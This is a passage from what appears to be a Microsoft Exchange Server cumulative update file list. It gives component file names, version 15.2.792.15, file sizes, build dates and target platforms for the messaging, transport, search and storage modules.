\nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.792.15| 75,152| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.792.15| 207,224| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.792.15| 440,712| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.792.15| 83,344| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.792.15| 35,200| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.792.15| 53,112| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.792.15| 96,648| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.migration.dll| 15.2.792.15| 1,110,392| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.792.15| 14,712| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.792.15| 135,568| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.792.15| 5,064,568| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.792.15| 19,832| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.792.15| 68,488| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.net.dll| 15.2.792.15| 5,086,088| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.792.15| 265,608| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.792.15| 37,752| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.792.15| 14,224| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.792.15| 549,776| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.792.15| 22,912| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.792.15| 106,376| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.792.15| 291,728| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.792.15| 17,296| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.792.15| 277,896| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.odata.dll| 15.2.792.15| 2,993,552| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.792.15| 90,504| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.792.15| 101,752| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.792.15| 38,288| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.792.15| 45,456| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.792.15| 58,232| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.792.15| 147,320| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.792.15| 26,512| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.792.15| 184,200| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.792.15| 26,488| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.792.15| 38,288| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.792.15| 55,696| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.792.15| 147,328| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.792.15| 191,864| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.792.15| 33,672| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.792.15| 28,048| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.792.15| 32,640| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.792.15| 15,240| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.792.15| 17,296| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.792.15| 17,296| 27-Apr-21| 11:33| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.792.15| 106,880| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.792.15| 106,880| 27-Apr-21| 11:33| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.792.15| 24,968| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.792.15| 24,968| 27-Apr-21| 11:34| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.792.15| 42,888| 27-Apr-21| 11:30| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.792.15| 264,568| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.792.15| 264,568| 27-Apr-21| 11:33| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.792.15| 358,280| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.792.15| 4,166,544| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.792.15| 308,624| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.792.15| 41,344| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.792.15| 30,584| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.792.15| 137,080| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.792.15| 441,720| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.792.15| 14,224| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.792.15| 224,656| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.792.15| 105,864| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.pst.dll| 15.2.792.15| 168,848| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.792.15| 168,848| 27-Apr-21| 11:30| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.792.15| 259,448| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.792.15| 72,072| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.792.15| 215,928| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.792.15| 106,872| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.792.15| 425,848| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.792.15| 70,520| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.792.15| 46,456| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.792.15| 215,416| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.query.core.dll| 15.2.792.15| 168,312| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.792.15| 343,416| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.792.15| 174,456| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.792.15| 95,096| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.792.15| 127,352| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.792.15| 63,376| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.792.15| 36,744| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.792.15| 17,800| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.792.15| 9,666,960| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.792.15| #########| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.792.15| 36,744| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.792.15| 97,672| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.792.15| 28,536| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.792.15| 72,080| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.792.15| 15,744| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.792.15| 13,192| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.792.15| 59,264| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.rpc.dll| 15.2.792.15| 1,647,496| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.792.15| 209,808| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.792.15| 60,280| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.792.15| 518,008| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.792.15| 161,168| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.792.15| 724,344| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.792.15| 243,088| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.792.15| 20,880| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.792.15| 35,216| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.792.15| 42,360| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.792.15| 56,208| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.792.15| 27,536| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.792.15| 130,448| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.792.15| 14,728| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.792.15| 20,368| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.792.15| 21,384| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.792.15| 267,664| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.792.15| 110,992| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.792.15| 112,504| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.792.15| 622,480| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.792.15| 185,208| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.792.15| 12,168| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.792.15| 19,320| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.search.core.dll| 15.2.792.15| 211,832| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.792.15| 17,784| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.792.15| 97,680| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.792.15| 16,776| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.792.15| 436,624| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.search.files.dll| 15.2.792.15| 274,296| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.792.15| 24,952| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.792.15| 217,992| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.search.service.exe| 15.2.792.15| 26,512| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.792.15| 221,064| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.security.dll| 15.2.792.15| 1,559,432| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.792.15| 19,832| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.792.15| 28,536| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.792.15| 225,168| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.792.15| 5,151,096| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.792.15| 214,904| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.792.15| 115,576| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.792.15| 82,800| 27-Apr-21| 11:32| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.792.15| 80,768| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.792.15| 66,448| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.792.15| 81,288| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.792.15| 211,832| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.792.15| 1,341,328| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.792.15| 511,888| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.792.15| 47,504| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.792.15| 873,360| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.792.15| 1,352,080| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.792.15| 30,584| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.792.15| 130,448| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.792.15| 1,018,760| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.792.15| 111,480| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.792.15| 34,680| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.792.15| 19,320| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.792.15| 14,720| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.792.15| 60,808| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.792.15| 50,576| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.792.15| 14,216| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.792.15| 14,200| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.services.common.dll| 15.2.792.15| 74,120| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.services.dll| 15.2.792.15| 8,480,656| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.792.15| 30,088| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.792.15| 633,720| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.792.15| 1,651,088| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.services.json.dll| 15.2.792.15| 296,312| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.792.15| 43,408| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.792.15| 233,336| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.792.15| 178,552| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.792.15| 348,536| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.792.15| 56,712| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.792.15| 93,048| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.792.15| 296,328| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.792.15| 35,720| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.792.15| 27,024| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.792.15| 114,576| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.792.15| 53,648| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.792.15| 75,144| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.792.15| 142,712| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.792.15| 24,968| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.792.15| 15,248| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.792.15| 58,744| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.792.15| 27,000| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.792.15| 46,992| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.sqm.dll| 15.2.792.15| 46,968| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.store.service.exe| 15.2.792.15| 28,040| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.792.15| 26,512| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.792.15| 13,712| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.792.15| 31,624| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.792.15| 1,205,112| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.792.15| 158,584| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.792.15| 628,112| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.792.15| 13,192| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.792.15| 16,248| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.792.15| 13,200| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.792.15| 221,560| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.792.15| 13,704| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.792.15| 29,048| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.792.15| 138,640| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.792.15| 21,904| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.792.15| 40,312| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.792.15| 22,928| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.792.15| 21,368| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.792.15| 212,368| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.792.15| 98,680| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.792.15| 22,904| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.792.15| 169,352| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.792.15| 18,296| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.792.15| 20,880| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.792.15| 31,608| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.792.15| 46,968| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.792.15| 30,096| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.792.15| 53,128| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.792.15| 44,936| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.792.15| 18,296| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.792.15| 46,464| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.792.15| 46,456| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.792.15| 28,048| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.792.15| 457,096| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.792.15| 18,296| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.792.15| 30,600| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.transport.dll| 15.2.792.15| 4,183,944| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.792.15| 182,152| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.792.15| 121,736| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.792.15| 403,840| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.792.15| 14,712| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.792.15| 89,976| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.792.15| 88,952| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.792.15| 68,488| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.792.15| 63,368| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.792.15| 430,472| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.792.15| 122,232| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.792.15| 17,784| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.792.15| 29,048| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.792.15| 60,792| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.792.15| 50,040| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.792.15| 33,160| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.792.15| 113,032| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.792.15| 18,312| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.792.15| 52,112| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.792.15| 675,192| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.792.15| 23,928| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.792.15| 17,784| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.792.15| 487,312| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.792.15| 12,688| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.792.15| 306,064| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.792.15| 15,752| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.792.15| 46,456| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.792.15| 1,044,360| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.792.15| 15,248| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.792.15| 18,824| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.792.15| 18,824| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.792.15| 118,664| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.792.15| 924,536| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.792.15| 1,469,304| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.792.15| 32,632| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.792.15| 41,848| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.792.15| 24,968| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.792.15| 15,224| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.792.15| 83,344| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.792.15| 50,048| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.792.15| 642,424| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.792.15| 186,256| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.792.15| 67,448| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.792.15| 12,664| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.792.15| 56,712| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.792.15| 27,512| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.792.15| 120,696| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.792.15| 31,624| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.792.15| 57,224| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.792.15| 35,728| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.webservices.dll| 15.2.792.15| 1,054,096| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.792.15| 67,984| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.792.15| 23,432| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.792.15| 77,176| 27-Apr-21| 11:35| x86 